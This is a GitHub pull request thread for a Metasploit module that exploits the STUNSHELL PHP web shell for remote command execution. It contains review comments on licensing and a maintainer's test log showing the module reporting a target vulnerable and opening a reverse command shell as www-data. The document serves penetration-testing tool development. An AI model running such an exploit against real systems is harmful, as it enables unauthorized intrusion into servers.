Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added STUNSHELL webshell remote command execution module #1647

Merged
merged 4 commits into from Mar 28, 2013
Merged

Added STUNSHELL webshell remote command execution module #1647

merged 4 commits into from Mar 28, 2013

Conversation

ghost
Copy link

@ghost ghost commented Mar 24, 2013

This module exploits the commonly unauthenticated STUNSHELL web shell with remote command execution.
More details here: https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL

@L1ghtn1ng
Copy link
Contributor

Hi thank you for your contribution, However you are missing the license information and can you run your module past msftidy thank you. The license information can be found in another module which is at the very top thank you. Also you needed to do the same to this PR #1646 to thank you

@ghost
Copy link
Author

ghost commented Mar 25, 2013

Will do.

@L1ghtn1ng
Copy link
Contributor

also you need to do it to #1644

@ghost
Copy link
Author

ghost commented Mar 25, 2013

I just did it to all 4 of my pull requests, anything else? Its my first time contributing.

@L1ghtn1ng
Copy link
Contributor

okay thanks for the changes so far, I cannot see any but when someone from rapid7 takes a look you probably will but the changes I got you to make helps speed up the process to get your code merged. By the way just wondering did you use an example of a module to created yours? as im wondering where people are using other modules to base theirs from as the license information missing in modules is a bit of a problem

@ghost
Copy link
Author

ghost commented Mar 25, 2013

I used existing misc modules as templates, but removed the licensing information, I was not sure if it should be applied before it was added to the actual metasploit project.

@L1ghtn1ng
Copy link
Contributor

ah okay thanks for that

@jvazquez-r7 jvazquez-r7 mentioned this pull request Mar 27, 2013
Merged
@jvazquez-r7
Copy link
Contributor

The cleanup applied to #1645 must be had into account here in order to merge it. Feel free to ask if there are questions or doubts in your side :)

@ghost
Copy link
Author

ghost commented Mar 27, 2013

I think I applied all the fixes to this one.

@jvazquez-r7 jvazquez-r7 merged commit f14d5ba into rapid7:master Mar 28, 2013
@jvazquez-r7
Copy link
Contributor

Thanks @Bwall

Merge after last cleanup, check it at: https://github.com/rapid7/metasploit-framework/tree/9b18eb858b4d373265a4b5403472e4301164f1a3

Test after cleanup:

msf exploit(stunshell_exec) > reload
[*] Reloading module...
checkmsf exploit(stunshell_exec) > check
[+] The target is vulnerable.
msf exploit(stunshell_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uC0sZLFLfLPSIE1S;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "uC0sZLFLfLPSIE1S\r\n"
i[*] Matching...
[*] B is input...
d[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.134:43153) at 2013-03-28 14:41:11 +0100


uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C

@jvazquez-r7
Copy link
Contributor

btw, just pointing, I checked news for this really deployed in the wild by malware attacks:

http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3APHP%2FStunshell.A
http://www.claudiokuenzler.com/blog/127/processes-launched-by-apache-stunshell-oscommerce

Thanks @Bwall !!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@L1ghtn1ng @jvazquez-r7